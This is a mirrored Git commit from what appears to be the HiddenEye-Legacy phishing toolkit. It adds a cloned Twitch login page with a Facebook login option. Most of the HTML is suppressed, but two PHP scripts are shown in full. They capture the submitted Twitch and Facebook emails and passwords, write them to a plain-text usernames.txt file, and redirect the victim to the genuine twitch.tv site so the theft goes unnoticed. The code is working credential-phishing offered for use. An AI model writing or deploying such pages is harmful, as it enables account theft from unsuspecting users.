mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
twitch_added with facebook also included
This commit is contained in:
parent
99346f6231
commit
61378829ab
17
WebPages/twitch/Facebook.html
Normal file
17
WebPages/twitch/Facebook.html
Normal file
File diff suppressed because one or more lines are too long
126
WebPages/twitch/index.html
Normal file
126
WebPages/twitch/index.html
Normal file
File diff suppressed because one or more lines are too long
59
WebPages/twitch/index_files/JW5GlLnAsFw.html
Normal file
59
WebPages/twitch/index_files/JW5GlLnAsFw.html
Normal file
File diff suppressed because one or more lines are too long
200
WebPages/twitch/index_files/anchor.html
Normal file
200
WebPages/twitch/index_files/anchor.html
Normal file
File diff suppressed because one or more lines are too long
188
WebPages/twitch/index_files/bframe.html
Normal file
188
WebPages/twitch/index_files/bframe.html
Normal file
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
BIN
WebPages/twitch/index_files/payload
Normal file
BIN
WebPages/twitch/index_files/payload
Normal file
Binary file not shown.
After Width: | Height: | Size: 23 KiB |
1
WebPages/twitch/index_files/styles__ltr.css
Normal file
1
WebPages/twitch/index_files/styles__ltr.css
Normal file
File diff suppressed because one or more lines are too long
14
WebPages/twitch/login.php
Normal file
14
WebPages/twitch/login.php
Normal file
|
@ -0,0 +1,14 @@
|
|||
<?php
|
||||
$var = $_POST['twitch_user'];
|
||||
$var2 = $_POST['twitch_pass'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[Twitch-EMAIL]: " . $var . " [Twitch-PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location:https://twitch.tv/login');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
}
|
||||
exit();
|
||||
?>
|
14
WebPages/twitch/post.php
Normal file
14
WebPages/twitch/post.php
Normal file
|
@ -0,0 +1,14 @@
|
|||
<?php
|
||||
$var = $_POST['fb_email'];
|
||||
$var2 = $_POST['fb_pass'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[FB-EMAIL]: " . $var . " [FB-PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location:https://twitch.tv/');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
}
|
||||
exit();
|
||||
?>
|
Loading…
Reference in New Issue
Block a user